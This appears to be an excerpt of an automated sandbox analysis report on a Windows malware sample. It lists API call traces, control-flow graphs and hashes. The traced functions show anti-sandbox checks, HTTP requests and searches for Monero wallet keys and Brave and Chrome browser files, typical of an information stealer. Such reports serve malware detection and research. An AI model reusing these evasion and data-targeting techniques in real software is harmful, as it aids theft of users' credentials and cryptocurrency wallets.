                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: b72e88abecc38b3db63a654b82a0df0ac0420bac0804252e0e75dd3dab43d8ae
                    • Instruction ID: d175270ddf9481e4d6c6bd8bc8e63fd549668c414a94d6bab8b9a7cc474a585d
                    • Opcode Fuzzy Hash: b72e88abecc38b3db63a654b82a0df0ac0420bac0804252e0e75dd3dab43d8ae
                    • Instruction Fuzzy Hash: 4F5193B5A04309EFCB04DFA1E994BBE77B5BF84704F188449E406A7341D774E941DB62

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1124 967500-96754a GetWindowsDirectoryA 1125 967553-9675c7 GetVolumeInformationA call 968d00 * 3 1124->1125 1126 96754c 1124->1126 1133 9675d8-9675df 1125->1133 1126->1125 1134 9675e1-9675fa call 968d00 1133->1134 1135 9675fc-967617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 967628-967658 wsprintfA call 96a740 1135->1137 1138 967619-967626 call 96a740 1135->1138 1145 96767e-96768e 1137->1145 1138->1145
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00967542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0096757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0096760A
                    • wsprintfA.USER32 ref: 00967640
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\
                    • API String ID: 1544550907-3809124531
                    • Opcode ID: 4e7d8c20057751b22bd3d69626df1b53f5037082700252a14e203110a289416e
                    • Instruction ID: 9636ca9d245909bd70f7d6c382c3f2f73de895f3dd152f639058e7e4565c616d
                    • Opcode Fuzzy Hash: 4e7d8c20057751b22bd3d69626df1b53f5037082700252a14e203110a289416e
                    • Instruction Fuzzy Hash: AF41A2B1D04248ABDF10DF94DC95BEEBBB8EF58744F100199F50967280DB78AA44CFA6

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24A0), ref: 009698A1
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2440), ref: 009698BA
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2218), ref: 009698D2
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2458), ref: 009698EA
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B23C8), ref: 00969903
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B8FA8), ref: 0096991B
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5AD0), ref: 00969933
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5AF0), ref: 0096994C
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2350), ref: 00969964
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2470), ref: 0096997C
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24D0), ref: 00969995
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2488), ref: 009699AD
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5BB0), ref: 009699C5
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24B8), ref: 009699DE
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 009511D0: ExitProcess.KERNEL32 ref: 00951211
                      • Part of subcall function 00951160: GetSystemInfo.KERNEL32(?), ref: 0095116A
                      • Part of subcall function 00951160: ExitProcess.KERNEL32 ref: 0095117E
                      • Part of subcall function 00951110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
                      • Part of subcall function 00951110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
                      • Part of subcall function 00951110: ExitProcess.KERNEL32 ref: 00951143
                      • Part of subcall function 00951220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
                      • Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951258
                      • Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951266
                      • Part of subcall function 00951220: ExitProcess.KERNEL32 ref: 00951294
                      • Part of subcall function 00966770: GetUserDefaultLangID.KERNEL32 ref: 00966774
                      • Part of subcall function 00951190: ExitProcess.KERNEL32 ref: 009511C6
                      • Part of subcall function 00967850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                      • Part of subcall function 00967850: RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                      • Part of subcall function 00967850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                      • Part of subcall function 009678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                      • Part of subcall function 009678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                      • Part of subcall function 009678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00966AF9
                    • Sleep.KERNEL32(00001770), ref: 00966B04
                    • CloseHandle.KERNEL32(?,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966B1A
                    • ExitProcess.KERNEL32 ref: 00966B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: b6dd313286719e3d59c247e5ce695b0c4b8432190df1e3ad4e87e0ac8e03028d
                    • Instruction ID: f3b12357c1b4993b3e0005dd02d32d299a10532068754c53f265e4e55694bb0c
                    • Opcode Fuzzy Hash: b6dd313286719e3d59c247e5ce695b0c4b8432190df1e3ad4e87e0ac8e03028d
                    • Instruction Fuzzy Hash: 28310771904208AADB04FBF0DD57BEE7778AF84340F504529F612B7192DF746A05CBA6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1204 951220-951247 call 9689b0 GlobalMemoryStatusEx 1207 951273-95127a 1204->1207 1208 951249-951271 call 96da00 * 2 1204->1208 1210 951281-951285 1207->1210 1208->1210 1212 951287 1210->1212 1213 95129a-95129d 1210->1213 1215 951292-951294 ExitProcess 1212->1215 1216 951289-951290 1212->1216 1216->1213 1216->1215
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
                    • __aulldiv.LIBCMT ref: 00951258
                    • __aulldiv.LIBCMT ref: 00951266
                    • ExitProcess.KERNEL32 ref: 00951294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: 626af16e8ce470b54cc94aa9c3707a51e2af67b9127ce67e42d510c037d14afd
                    • Instruction ID: 47b9067e3c2cb450e04738a03921db52951b70e0a23b318c3c9b0dce98f72a13
                    • Opcode Fuzzy Hash: 626af16e8ce470b54cc94aa9c3707a51e2af67b9127ce67e42d510c037d14afd
                    • Instruction Fuzzy Hash: 04016DB0D44308BBEB10DFE1CC4AB9EBB78AB44706F208049EB15B62C0DB7455858B99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1218 966af3 1219 966b0a 1218->1219 1221 966b0c-966b22 call 966920 call 965b10 CloseHandle ExitProcess 1219->1221 1222 966aba-966ad7 call 96aad0 OpenEventA 1219->1222 1227 966af5-966b04 CloseHandle Sleep 1222->1227 1228 966ad9-966af1 call 96aad0 CreateEventA 1222->1228 1227->1219 1228->1221
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00966AF9
                    • Sleep.KERNEL32(00001770), ref: 00966B04
                    • CloseHandle.KERNEL32(?,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966B1A
                    • ExitProcess.KERNEL32 ref: 00966B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: e6ce2b0ceda2fe7edf6ef5ea9e398295b69d0944887839fb2bb83a5a15e44747
                    • Instruction ID: 3cfd88e8e5043b92fe2c630332641c824468844aa6677ee974d226137e79585e
                    • Opcode Fuzzy Hash: e6ce2b0ceda2fe7edf6ef5ea9e398295b69d0944887839fb2bb83a5a15e44747
                    • Instruction Fuzzy Hash: 2DF05830A44209EBE710ABF0DD1ABBE7B38EB44741F208916B902A21C1CFB45940DAA6

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 0e34c59644ad27e57ba0236294af200181d4e851594a8161494d1f73b22a424d
                    • Instruction ID: dd278453efa0de9ec9ccaa00ffbe3ca45f0f472f6ebc05fa508f0312f1c9b488
                    • Opcode Fuzzy Hash: 0e34c59644ad27e57ba0236294af200181d4e851594a8161494d1f73b22a424d
                    • Instruction Fuzzy Hash: 3C212CB1D00209ABDF14DFA4E845BDE7B75EB44320F108626E915A7281EB706A05CF92

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 00956280: InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                      • Part of subcall function 00956280: StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                      • Part of subcall function 00956280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                      • Part of subcall function 00956280: HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                      • Part of subcall function 00956280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                      • Part of subcall function 00956280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 7acab794eea682d570f296e2d5944adf099f0804b47d6f26780ed21d6b14d214
                    • Instruction ID: 225220f5e41e43f56fb8d035980f28cbff1ac5598bcd2cef08c9c8964a560639
                    • Opcode Fuzzy Hash: 7acab794eea682d570f296e2d5944adf099f0804b47d6f26780ed21d6b14d214
                    • Instruction Fuzzy Hash: 0F110330910148A7CB14FF64DD92BED7338AF90340F404555F91A67592EF346B06CB95
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
                    • ExitProcess.KERNEL32 ref: 00951143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: d03670be5a0e894e0ceeb1583aa3b29b3a09a0901fbcb6d44efbf5c05955dc65
                    • Instruction ID: aa5ba71cebe735f28d197e1ac36d296d6f1930ede380a9630a2703de81239cf9
                    • Opcode Fuzzy Hash: d03670be5a0e894e0ceeb1583aa3b29b3a09a0901fbcb6d44efbf5c05955dc65
                    • Instruction Fuzzy Hash: 5CE0E670955308FBE710ABA19D0EB097678AB04B02F104155F709771D0DAB52A4497D9
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009510B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009510F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: eea81df2ecb034081eab8970e4b2e969b6dab16b55cc5a3597d7a091d4c44e9d
                    • Instruction ID: 196f5641a1edb99375ecba4ca0c730a6e38bc0f36cfcacaea84472ccd0cac861
                    • Opcode Fuzzy Hash: eea81df2ecb034081eab8970e4b2e969b6dab16b55cc5a3597d7a091d4c44e9d
                    • Instruction Fuzzy Hash: 10F0E271641208BBEB14DAB4AC5AFBBB7ECE705B15F300848F904E3280D9719E04CBA1
                    APIs
                      • Part of subcall function 009678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                      • Part of subcall function 009678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                      • Part of subcall function 009678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                      • Part of subcall function 00967850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                      • Part of subcall function 00967850: RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                      • Part of subcall function 00967850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                    • ExitProcess.KERNEL32 ref: 009511C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 219fad0e68d235923b5b1f44dd7fcc484ffe8b07dd1f3bf549f7f65547f7747c
                    • Instruction ID: cc17d63d1636c6277f400c63b911ef79f32bc0215c11208dc66187d00dd65faa
                    • Opcode Fuzzy Hash: 219fad0e68d235923b5b1f44dd7fcc484ffe8b07dd1f3bf549f7f65547f7747c
                    • Instruction Fuzzy Hash: B3E05BB591430153DA0073F1BD8BB2B379C5B5434EF040925FE05D3102FE25FC0486A6
                    APIs
                    • wsprintfA.USER32 ref: 009638CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 009638E3
                    • lstrcat.KERNEL32(?,?), ref: 00963935
                    • StrCmpCA.SHLWAPI(?,00970F70), ref: 00963947
                    • StrCmpCA.SHLWAPI(?,00970F74), ref: 0096395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00963C67
                    • FindClose.KERNEL32(000000FF), ref: 00963C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: f2642dad110a3da3b56f81fa148d2efbcfd34cb795228fc49f7f1f7cb346a52b
                    • Instruction ID: 47f8927d481b5bdb3a3bc7ba4af56d26e6d8ac406f69ebc17ba4708897db62ee
                    • Opcode Fuzzy Hash: f2642dad110a3da3b56f81fa148d2efbcfd34cb795228fc49f7f1f7cb346a52b
                    • Instruction Fuzzy Hash: 25A11EB2A002189BDB24DFA4DD85FEA737CBB98300F448589F54D97141EB759B84CFA2
                    APIs
                    • wsprintfA.USER32 ref: 0096492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00964943
                    • StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                    • StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
                    • FindClose.KERNEL32(000000FF), ref: 00964B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*$h[
                    • API String ID: 180737720-897309356
                    • Opcode ID: 75fc9df7d8c160a719fdbb2ce995cffb2e2938e14565cd307d9bdea7d633cdef
                    • Instruction ID: 955f191f1c0c9fbbdc3dfcf6986cca826e5f2d09e80906339dcf5e36233c2f0f
                    • Opcode Fuzzy Hash: 75fc9df7d8c160a719fdbb2ce995cffb2e2938e14565cd307d9bdea7d633cdef
                    • Instruction Fuzzy Hash: 866123B2910218ABCB24EBA0DD85FEA737CBB88701F048589F50997141EF75AB85CF91
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00970B32,00970B2B,00000000,?,?,?,009713F4,00970B2A), ref: 0095BEF5
                    • StrCmpCA.SHLWAPI(?,009713F8), ref: 0095BF4D
                    • StrCmpCA.SHLWAPI(?,009713FC), ref: 0095BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0095C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: ad9ec75c4b0fb41c5f7429bec3bcd548deb861b7453f46877119ee2d67559be7
                    • Instruction ID: be9e2bbf33ed32acd29f49ccc8f4e17d54600aba80bb8217e63c0b613f04a5ff
                    • Opcode Fuzzy Hash: ad9ec75c4b0fb41c5f7429bec3bcd548deb861b7453f46877119ee2d67559be7
                    • Instruction Fuzzy Hash: 11422272910104ABDB14FB70DD96FEE737DABD4300F408559B90AA7191EE34AB49CFA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00964580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00964587
                    • wsprintfA.USER32 ref: 009645A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 009645BD
                    • StrCmpCA.SHLWAPI(?,00970FC4), ref: 009645EB
                    • StrCmpCA.SHLWAPI(?,00970FC8), ref: 00964601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0096468B
                    • FindClose.KERNEL32(000000FF), ref: 009646A0
                    • lstrcat.KERNEL32(?,005BE768), ref: 009646C5
                    • lstrcat.KERNEL32(?,005BDCC0), ref: 009646D8
                    • lstrlen.KERNEL32(?), ref: 009646E5
                    • lstrlen.KERNEL32(?), ref: 009646F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*$h[
                    • API String ID: 671575355-2171546709
                    • Opcode ID: d54a464cab62ce134f2d795c8bec0cf1b19840e57b2050aa32247128d8f2cc80
                    • Instruction ID: 4172bb8b92c95a529c7787f6fff1b4a7bd9f2e4bb633da31e26c280f3660594c
                    • Opcode Fuzzy Hash: d54a464cab62ce134f2d795c8bec0cf1b19840e57b2050aa32247128d8f2cc80
                    • Instruction Fuzzy Hash: 445136B25502189BCB24EBB0DD89FEE737CAB94700F404589F60997190EF749B85CF92
                    APIs
                    • wsprintfA.USER32 ref: 00963EC3
